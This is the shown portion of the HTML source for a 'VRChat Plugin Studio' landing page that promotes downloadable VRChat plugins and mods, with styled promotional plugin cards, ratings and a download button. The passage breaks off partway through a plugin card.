-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
1293 lines (1093 loc) · 60.9 KB
/
index.html
File metadata and controls
1293 lines (1093 loc) · 60.9 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>VRChat Plugin Studio — Download VRChat Plugins & Mods</title>
<!-- Favicon & Site Icons -->
<link rel="icon" type="image/png" sizes="32x32" href="images/my-new-logo.png">
<link rel="icon" type="image/png" sizes="16x16" href="images/my-new-logo.png">
<link rel="apple-touch-icon" sizes="180x180" href="images/my-new-logo.png">
<link rel="manifest" href="manifest.json">
<!-- SEO Meta Tags -->
<meta name="description" content="Download VRChat Plugin Studio to create, customize and enhance your VRChat worlds and avatars. Explore top VRChat plugins and join the developer community.">
<meta name="author" content="VRChat Plugin Studio">
<meta name="title" content="VRChat Plugin Studio - Download VRChat Plugins & Mods Free">
<meta name="description" content="Download and install the best VRChat plugins and mods for avatars and worlds. Create, customize and enhance your VRChat experience with VRChat Plugin Studio.">
<meta name="keywords" content="vrchat plugin, vrchat plugins, vrchat plugin download, vrchat plugins download, vrchat mod, vrchat mod download, vrchat tools, vrchat avatar optimization, vrchat mods free">
<meta property="og:image" content="https://vrchatplugin.net/images/my-new-logo.png">
<meta property="og:url" content="https://vrchatplugin.net">
<meta name="twitter:card" content="summary_large_image">
<!-- Robots Meta -->
<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1">
<meta name="googlebot" content="index, follow">
<!-- Canonical URL -->
<link rel="canonical" href="https://vrchatplugin.net">
<meta property="og:type" content="website">
<meta property="og:title" content="VRChat Plugin Studio - Download Best VRChat Plugins & Mods">
<meta property="og:description" content="Enhance VRChat with free plugins and mods. Download VRChat Plugin Studio to customize avatars, worlds, and gameplay.">
<meta property="og:image" content="https://vrchatplugin.net/images/my-new-logo.png">
<meta property="og:url" content="https://vrchatplugin.net">
<meta property="og:site_name" content="VRChat Plugin Studio">
<!-- Twitter Card -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="VRChat Plugin Studio">
<meta name="twitter:description" content="Create and download VRChat plugins easily. Free tools for developers and players.">
<meta name="twitter:image" content="https://vrchatplugin.net/images/my-new-logo.png">
<!-- Favicons -->
<link rel="icon" type="image/png" sizes="32x32" href="images/my-new-logo.png">
<link rel="apple-touch-icon" href="images/my-new-logo.png">
<!-- Manifest -->
<link rel="manifest" href="manifest.json">
<!-- Schema Markup (JSON-LD) -->
<script type="application/ld+json">
{
"@context": "https://schema.org",
"@type": "SoftwareApplication",
"name": "VRChat Plugin Studio",
"operatingSystem": "Windows, macOS, Linux",
"applicationCategory": "DeveloperApplication",
"description": "Create and enhance VRChat experiences with custom plugins for avatars and worlds.",
"offers": {
"@type": "Offer",
"price": "0.00",
"priceCurrency": "USD"
},
"aggregateRating": {
"@type": "AggregateRating",
"ratingValue": "4.9",
"reviewCount": "2300"
},
"url": "https://vrchatplugin.net",
"image": "https://vrchatplugin.net/images/my-new-logo.png",
"publisher": {
"@type": "Organization",
"name": "VRChat Plugin Studio",
"logo": {
"@type": "ImageObject",
"url": "https://vrchatplugin.net/images/my-new-logo.png"
}
}
}
</script>
<script src="3.4.17"></script>v
<style>
@import url('css2');
* {
font-family: 'Inter', sans-serif;
}
.hero-gradient {
background: linear-gradient(135deg, #0f0f23 0%, #1a1a2e 25%, #16213e 50%, #0f3460 100%);
position: relative;
overflow: hidden;
}
.hero-gradient::before {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: radial-gradient(circle at 20% 80%, rgba(120, 119, 198, 0.3) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(255, 119, 198, 0.3) 0%, transparent 50%);
animation: gradientShift 8s ease-in-out infinite;
}
@keyframes gradientShift {
0%, 100% { opacity: 1; }
50% { opacity: 0.7; }
}
.floating {
animation: floating 6s ease-in-out infinite;
}
.floating-delayed {
animation: floating 6s ease-in-out infinite;
animation-delay: -2s;
}
.floating-delayed-2 {
animation: floating 6s ease-in-out infinite;
animation-delay: -4s;
}
@keyframes floating {
0%, 100% {
transform: translateY(0px) rotate(0deg);
}
33% {
transform: translateY(-20px) rotate(1deg);
}
66% {
transform: translateY(-10px) rotate(-1deg);
}
}
.card-3d {
transform-style: preserve-3d;
transition: all 0.5s cubic-bezier(0.23, 1, 0.320, 1);
}
.card-3d:hover {
transform: rotateX(5deg) rotateY(5deg) translateZ(20px);
box-shadow:
0 25px 50px rgba(0, 0, 0, 0.3),
0 0 0 1px rgba(255, 255, 255, 0.1),
inset 0 1px 0 rgba(255, 255, 255, 0.2);
}
.glow-effect {
position: relative;
overflow: hidden;
}
.glow-effect::before {
content: '';
position: absolute;
top: -50%;
left: -50%;
width: 200%;
height: 200%;
background: conic-gradient(from 0deg, transparent, rgba(120, 119, 198, 0.4), transparent);
animation: rotate 4s linear infinite;
z-index: -1;
}
.glow-effect::after {
content: '';
position: absolute;
inset: 2px;
background: inherit;
border-radius: inherit;
z-index: -1;
}
@keyframes rotate {
100% { transform: rotate(360deg); }
}
.text-glow {
text-shadow: 0 0 20px rgba(120, 119, 198, 0.5);
}
.pulse-glow {
animation: pulseGlow 3s ease-in-out infinite;
}
@keyframes pulseGlow {
0%, 100% {
box-shadow: 0 0 20px rgba(120, 119, 198, 0.4);
transform: scale(1);
}
50% {
box-shadow: 0 0 40px rgba(120, 119, 198, 0.8);
transform: scale(1.05);
}
}
.nav-link {
position: relative;
transition: all 0.3s cubic-bezier(0.23, 1, 0.320, 1);
}
.nav-link::after {
content: '';
position: absolute;
width: 0;
height: 2px;
bottom: -5px;
left: 50%;
background: linear-gradient(90deg, #7877c6, #ff77c6);
transition: all 0.3s cubic-bezier(0.23, 1, 0.320, 1);
}
.nav-link:hover::after {
width: 100%;
left: 0;
}
.slide-in-left {
animation: slideInLeft 1s cubic-bezier(0.23, 1, 0.320, 1);
}
.slide-in-right {
animation: slideInRight 1s cubic-bezier(0.23, 1, 0.320, 1);
}
.slide-in-up {
animation: slideInUp 1s cubic-bezier(0.23, 1, 0.320, 1);
}
@keyframes slideInLeft {
from { opacity: 0; transform: translateX(-100px); }
to { opacity: 1; transform: translateX(0); }
}
@keyframes slideInRight {
from { opacity: 0; transform: translateX(100px); }
to { opacity: 1; transform: translateX(0); }
}
@keyframes slideInUp {
from { opacity: 0; transform: translateY(100px); }
to { opacity: 1; transform: translateY(0); }
}
.morphing-bg {
background: linear-gradient(-45deg, #0f0f23, #1a1a2e, #16213e, #0f3460);
background-size: 400% 400%;
animation: gradientMorph 15s ease infinite;
}
@keyframes gradientMorph {
0% { background-position: 0% 50%; }
50% { background-position: 100% 50%; }
100% { background-position: 0% 50%; }
}
.vr-icon {
background: linear-gradient(135deg, #7877c6, #ff77c6);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
animation: iconPulse 2s ease-in-out infinite;
}
@keyframes iconPulse {
0%, 100% { transform: scale(1); }
50% { transform: scale(1.1); }
}
.feature-card {
backdrop-filter: blur(10px);
background: rgba(255, 255, 255, 0.05);
border: 1px solid rgba(255, 255, 255, 0.1);
transition: all 0.4s cubic-bezier(0.23, 1, 0.320, 1);
}
.feature-card:hover {
background: rgba(255, 255, 255, 0.1);
border-color: rgba(120, 119, 198, 0.5);
transform: translateY(-10px) scale(1.02);
}
.code-block {
background: linear-gradient(135deg, rgba(15, 15, 35, 0.9), rgba(26, 26, 46, 0.9));
border: 1px solid rgba(120, 119, 198, 0.3);
backdrop-filter: blur(10px);
}
.typing-animation {
overflow: hidden;
border-right: 2px solid #7877c6;
white-space: nowrap;
animation: typing 3s steps(40, end), blink-caret 0.75s step-end infinite;
}
@keyframes typing {
from { width: 0; }
to { width: 100%; }
}
@keyframes blink-caret {
from, to { border-color: transparent; }
50% { border-color: #7877c6; }
}
/* Loader Styles */
#loader {
position: fixed;
inset: 0;
background: #0f0f23;
display: flex;
align-items: center;
justify-content: center;
z-index: 9999;
transition: opacity 0.5s ease;
}
#loader.hidden {
opacity: 0;
pointer-events: none;
}
.spinner {
width: 48px;
height: 48px;
border: 6px solid #7877c6;
border-top-color: transparent;
border-radius: 50%;
animation: spin 1s linear infinite;
}
@keyframes spin {
to { transform: rotate(360deg); }
}
/* YENİ: Kart için parlama animasyonu */
@keyframes spin-slow {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.animate-spin-slow {
animation: spin-slow 10s linear infinite;
}
/* Ripple Effect */
.ripple {
position: absolute;
border-radius: 50%;
background: rgba(255, 255, 255, 0.4);
transform: scale(0);
animation: ripple-animation 0.6s linear;
pointer-events: none;
}
@keyframes ripple-animation {
to {
transform: scale(4);
opacity: 0;
}
}
/* Mobile Menu Styles */
.mobile-menu {
transform: translateX(100%);
transition: transform 0.3s ease-in-out;
}
.mobile-menu.open {
transform: translateX(0);
}
/* Plugin Card Image Styles */
.plugin-image {
height: 200px;
object-fit: cover;
transition: all 0.4s ease;
}
.feature-card:hover .plugin-image {
transform: scale(1.05);
filter: brightness(1.1);
}
/* Gallery Image Styles */
.gallery-image {
height: 500px;
object-fit: cover;
transition: all 0.6s cubic-bezier(0.23, 1, 0.320, 1);
}
.gallery-card:hover .gallery-image {
transform: scale(1.05);
filter: brightness(1.1) contrast(1.1);
}
/* Mobile Optimizations */
@media (max-width: 768px) {
.hero-gradient::before,
.glow-effect::before {
display: none;
}
.floating {
animation: none;
}
.text-5xl { font-size: 2.5rem; }
.text-7xl { font-size: 3rem; }
.plugin-image { height: 150px; }
.gallery-image { height: 300px; }
}
/* Mobil optimizasyon: ağır animasyonları kapat */
@media (max-width: 768px) {
.animate-spin,
.animate-spin-slow,
.floating,
.floating-delayed,
.floating-delayed-2 {
animation: none !important;
}
}
</style>
</head>
<body class="bg-gray-900 text-white overflow-x-hidden">
<!-- Loader -->
<div id="loader">
<div class="spinner"></div>
</div>
<!-- Navigation -->
<nav class="fixed w-full z-50 bg-gray-900/80 backdrop-blur-md border-b border-gray-800/50">
<div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div class="flex justify-between items-center h-16">
<div class="flex items-center space-x-3">
<div class="w-10 h-10 bg-gradient-to-r from-purple-500 to-pink-500 rounded-xl flex items-center justify-center glow-effect">
<img loading="lazy" src="images/my-new-logo.png" alt="VRChat Logo" class="w-8 h-8 object-contain" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAzMiAzMiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlIGN4PSIxNiIgY3k9IjE2IiByPSIxNCIgZmlsbD0iIzY4NzZjNiIvPjx0ZXh0IHg9IjE2IiB5PSIxOCIgZm9udC1mYW1pbHk9IkFyaWFsIiBmb250LXNpemU9IjEyIiBmaWxsPSJ3aGl0ZSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii40ZW0iPlZSPC90ZXh0Pjwvc3ZnPg=='; this.alt='VR Logo';">
</div>
<span class="text-xl font-bold text-glow">VRChat Plugin </span>
</div>
<!-- Desktop Navigation -->
<div class="hidden md:flex space-x-8">
<a href="#Gome" class="nav-link hover:text-purple-400">Home Page</a>
<a href="#Plugins" class="nav-link hover:text-purple-400">Plugins</a>
<a href="#Community" class="nav-link hover:text-purple-400">Community</a>
<a href="#Download" class="nav-link hover:text-purple-400">Download</a>
</div>
<!-- Desktop Buttons -->
<div class="hidden md:flex space-x-4">
</div>
<!-- Mobile Menu Button -->
<button id="mobile-menu-btn" class="md:hidden text-white">
<svg class="w-6 h-6" fill="none" stroke="currentColor" viewbox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16"></path>
</svg>
</button>
</div>
</div>
<!-- Mobile Menu -->
<div id="mobile-menu" class="mobile-menu md:hidden bg-gray-900/95 backdrop-blur-md border-t border-gray-800">
<div class="px-4 py-4 space-y-4">
<a href="#home" class="block py-2 px-4 nav-link hover:text-purple-400">Home Page</a>
<a href="#plugins" class="block py-2 px-4 nav-link hover:text-purple-400">plugins</a>
<a href="#gallery" class="block py-2 px-4 nav-link hover:text-purple-400">Görseller</a>
<a href="#community" class="block py-2 px-4 nav-link hover:text-purple-400">Community</a>
<a href="#download" class="block py-2 px-4 nav-link hover:text-purple-400">download</a>
<div class="pt-4 space-y-2">
<button onclick="handleLogin()" class="w-full px-4 py-2 text-purple-400 border border-purple-400/50 rounded-lg hover:bg-purple-400/10 transition-all">
Giriş Yap
</button>
<button class="w-full px-4 py-2 bg-gradient-to-r from-purple-500 to-pink-500 rounded-lg hover:from-purple-600 hover:to-pink-600 transition-all pulse-glow">
Plugin Geliştir
</button>
</div>
</div>
</div>
</nav>
<!-- Hero Section -->
<section id="home" class="hero-gradient min-h-screen flex items-center relative">
<!-- Floating VR Elements -->
<div class="absolute inset-0 overflow-hidden pointer-events-none">
<div class="floating absolute top-20 left-10 text-6xl opacity-20">🥽</div>
<div class="floating-delayed absolute top-40 right-20 text-4xl opacity-30">🎮</div>
<div class="floating-delayed-2 absolute bottom-40 left-20 text-5xl opacity-25">🌐</div>
<div class="floating absolute bottom-20 right-10 text-3xl opacity-35">⚡</div>
</div>
<div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10">
<div class="grid lg:grid-cols-2 gap-12 items-center">
<div class="slide-in-left">
<h1 class="text-5xl lg:text-7xl font-black mb-6 leading-tight">
<span class="text-glow">VRChat</span>
<br>
<span class="bg-gradient-to-r from-purple-400 via-pink-400 to-blue-400 bg-clip-text text-transparent">
Plugin
</span>
<br>
</h1>
<p class="text-lg lg:text-xl text-gray-300 mb-8 leading-relaxed">
Try powerful add-ons that will take your VRChat experience to the next level.
</p>
<div class="flex flex-col sm:flex-row gap-4">
<!-- HERO DOWNLOAD BUTTON - GÜNCELLENDİ -->
<a href="#" onclick="downloadFile()" class="px-8 py-4 bg-gradient-to-r from-purple-500 to-pink-500 rounded-xl text-lg font-semibold hover:from-purple-600 hover:to-pink-600 transition-all transform hover:scale-105 pulse-glow">
🚀 VRCPlugin Download
</a>
</div>
</div>
<div class="slide-in-right relative">
<div class="relative group overflow-hidden rounded-3xl card-3d h-64 lg:h-80 bg-gradient-to-br from-purple-900/20 to-pink-900/20 border border-white/10">
<!-- Orbiting Elements -->
<div class="absolute inset-0 animate-spin" style="animation-duration: 20s;">
<div class="absolute top-0 left-1/2 transform -translate-x-1/2 -translate-y-4">
<div class="w-4 h-4 bg-purple-500 rounded-full pulse-glow"></div>
</div>
<div class="absolute bottom-0 left-1/2 transform -translate-x-1/2 translate-y-4">
<div class="w-4 h-4 bg-pink-500 rounded-full pulse-glow"></div>
</div>
<div class="absolute left-0 top-1/2 transform -translate-y-1/2 -translate-x-4">
<div class="w-4 h-4 bg-blue-500 rounded-full pulse-glow"></div>
</div>
<div class="absolute right-0 top-1/2 transform -translate-y-1/2 translate-x-4">
<div class="w-4 h-4 bg-green-500 rounded-full pulse-glow"></div>
</div>
</div>
<!-- İç kısım -->
<div class="relative z-10">
<img loading="lazy" src="store_item_assets/steam/apps/438100/capsule_616x353.jpg?t=1753401422"
alt="VRChat Official Screenshot"
class="w-full h-48 lg:h-64 object-cover rounded-2xl mb-2 glow-effect transform transition duration-500 group-hover:scale-110"
onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNjE2IiBoZWlnaHQ9IjM1MyIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPlZSQ2hhdCBJbWFnZTwvdGV4dD48L3N2Zz4='; this.alt='';">
<div class="text-center">
<h3 class="text-lg lg:text-xl font-bold text-glow transition-all duration-500 transform group-hover:-translate-y-1">
VRChat Plugins
</h3>
<p class="text-gray-300 text-sm opacity-80 transition-opacity duration-500 group-hover:opacity-100 -mt-">
Enhance the official VRChat experience
</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- RESİMLİ PLUGİNLER BÖLÜMÜ -->
<section id="plugins" class="py-20 morphing-bg relative">
<div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div class="text-center mb-16 slide-in-up">
<h2 class="text-5xl font-bold mb-4 text-glow">Popular Plugins
</h2>
<p class="text-xl text-gray-300 typing-animation">The best plugins to transform your VRChat experience</p>
</div>
<div class="grid md:grid-cols-3 gap-8">
<!-- Avatar Enhancer Plugin -->
<div class="card-3d feature-card rounded-2xl p-6 overflow-hidden group">
<!-- Plugin Header with Image -->
<div class="relative mb-4">
<img loading="lazy" src="uploads/items/item/6706/imgs/3e5c57cab4cd4c6cbef066990387670e.jpg" alt="Avatar Enhancer Plugin" class="plugin-image w-full rounded-xl glow-effect" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAwIiBoZWlnaHQ9IjIwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPkF2YXRhciBFbmhhbmNlciBVc2VyPC90ZXh0Pjwvc3ZnPg=='; this.alt='Avatar Enhancer image failed to load';">
<!-- Gradient Overlay -->
<div class="absolute inset-0 bg-gradient-to-t from-black/60 via-transparent to-transparent opacity-0 group-hover:opacity-100 transition-opacity duration-300"></div>
<!-- Plugin Icon -->
<div class="absolute top-3 right-3 w-10 h-10 bg-gradient-to-r from-purple-500 to-pink-500 rounded-lg flex items-center justify-center glow-effect opacity-0 group-hover:opacity-100 transition-opacity duration-300">
<span class="text-white text-sm font-bold vr-icon">🎨</span>
</div>
</div>
<!-- Plugin Content -->
<div class="space-y-4">
<h3 class="text-xl font-bold text-glow group-hover:text-purple-400 transition-colors duration-300">
Avatar Enhancer
</h3>
<p class="text-gray-300 text-sm leading-relaxed">
Special animations, glow effects and advanced features for your avatars
Add interactions. Fully customizable system.
</p>
<div class="flex justify-between items-center text-xs text-gray-400 mb-4">
<span>⭐ 4.9 (2.3K)</span>
<span>📥 15K+</span>
</div>
</div>
</div>
<!-- World Builder Plugin -->
<div class="card-3d feature-card rounded-2xl p-6 overflow-hidden group">
<!-- Plugin Header with Image -->
<div class="relative mb-4">
<img loading="lazy" src="uploads/items/item/2309/imgs/c131dedd2c164d898175eff2ea1ead6d.jpg" alt="World Builder Plugin" class="plugin-image w-full rounded-xl glow-effect" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAwIiBoZWlnaHQ9IjIwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPldvcmxkIEJ1aWxkZXI8L3RleHQ+PC9zdmc+'; this.alt='World Builder image failed to load';">
<!-- Gradient Overlay -->
<div class="absolute inset-0 bg-gradient-to-t from-black/60 via-transparent to-transparent opacity-0 group-hover:opacity-100 transition-opacity duration-300"></div>
<!-- Plugin Icon -->
<div class="absolute top-3 right-3 w-10 h-10 bg-gradient-to-r from-blue-500 to-teal-500 rounded-lg flex items-center justify-center glow-effect opacity-0 group-hover:opacity-100 transition-opacity duration-300">
<span class="text-white text-sm font-bold vr-icon">🌍</span>
</div>
</div>
<!-- Plugin Content -->
<div class="space-y-4">
<h3 class="text-xl font-bold text-glow group-hover:text-blue-400 transition-colors duration-300">
World Builder
</h3>
<p class="text-gray-300 text-sm leading-relaxed">
Interactive environments with real-time world editor and
Create dynamic structures. Including portal system.
</p>
<!-- Stats -->
<div class="flex justify-between items-center text-xs text-gray-400 mb-4">
<span>⭐ 4.8 (1.8K)</span>
<span>📥 12K+</span>
</div>
</div>
</div>
<!-- Performance Optimizer Plugin -->
<div class="card-3d feature-card rounded-2xl p-6 overflow-hidden group">
<!-- Plugin Header with Image -->
<div class="relative mb-4">
<img loading="lazy" src="uploads/items/item/5805/imgs/ae55409dcb8c4b03864f2fa0f500706e.png" alt="Performance Optimizer Plugin" class="plugin-image w-full rounded-xl glow-effect" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAwIiBoZWlnaHQ9IjIwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPlBlcmZvcm1hbmNlPC90ZXh0Pjwvc3ZnPg=='; this.alt='Performance Optimizer image failed to load';">
<!-- Gradient Overlay -->
<div class="absolute inset-0 bg-gradient-to-t from-black/60 via-transparent to-transparent opacity-0 group-hover:opacity-100 transition-opacity duration-300"></div>
<!-- Plugin Icon -->
<div class="absolute top-3 right-3 w-10 h-10 bg-gradient-to-r from-green-500 to-emerald-500 rounded-lg flex items-center justify-center glow-effect opacity-0 group-hover:opacity-100 transition-opacity duration-300">
<span class="text-white text-sm font-bold vr-icon">⚡</span>
</div>
</div>
<!-- Plugin Content -->
<div class="space-y-4">
<h3 class="text-xl font-bold text-glow group-hover:text-green-400 transition-colors duration-300">
Performance Optimizer
</h3>
<p class="text-gray-300 text-sm leading-relaxed">
Automatic LOD system, texture optimization and
Advanced FPS boosting tools. Smooth VR experience.
</p>
<!-- Stats -->
<div class="flex justify-between items-center text-xs text-gray-400 mb-4">
<span>⭐ 4.9 (3.1K)</span>
<span>📥 28K+</span>
</div>
</div>
</div>
</div>
<!-- YENİ PLUGİN KARTLARI -->
<div class="grid md:grid-cols-3 gap-8 mt-16">
<!-- ERP Mode Plugin -->
<div class="card-3d feature-card rounded-2xl p-6 overflow-hidden group">
<div class="relative mb-4">
<img loading="lazy" src="uploads/items/item/6706/imgs/4f0fb4ce8b1e079f32e7f15d967ea3.png" alt="ERP Mode Plugin" class="plugin-image w-full rounded-xl glow-effect" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAwIiBoZWlnaHQ9IjIwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPkVSUCBNb2RlPC90ZXh0Pjwvc3ZnPg=='; this.alt='ERP Mode image failed to load';">
<!-- Gradient Overlay -->
<div class="absolute inset-0 bg-gradient-to-t from-black/60 via-transparent to-transparent opacity-0 group-hover:opacity-100 transition-opacity duration-300"></div>
<!-- Plugin Icon -->
<div class="absolute top-3 right-3 w-10 h-10 bg-gradient-to-r from-pink-500 to-red-500 rounded-lg flex items-center justify-center glow-effect opacity-0 group-hover:opacity-100 transition-opacity duration-300">
<span class="text-white text-sm font-bold vr-icon">💕</span>
</div>
</div>
<div class="space-y-4">
<h3 class="text-xl font-bold text-glow group-hover:text-pink-400 transition-colors duration-300">ERP Mode</h3>
<p class="text-gray-300 text-sm leading-relaxed">
Fully immersive roleplay mode for VRChat — enhances realism with ambient sounds, mood lighting, and synchronized effects.
</p>
<div class="flex justify-between items-center text-xs text-gray-400 mb-4">
<span>⭐ 4.8 (27.4K)</span>
<span>📥 180K+</span>
</div>
</div>
</div>
<!-- Surprised Eyeball Plugin -->
<div class="card-3d feature-card rounded-2xl p-6 overflow-hidden group">
<div class="relative mb-4">
<img loading="lazy" src="uploads/items/item/2309/imgs/4f0fb4ce8b1e079f32e7f15d967ea7.png" alt="Eyeball Mode Plugin" class="plugin-image w-full rounded-xl glow-effect" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAwIiBoZWlnaHQ9IjIwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPkV5ZWJhbGw8L3RleHQ+PC9zdmc+'; this.alt='Eyeball Mode image failed to load';">
<!-- Gradient Overlay -->
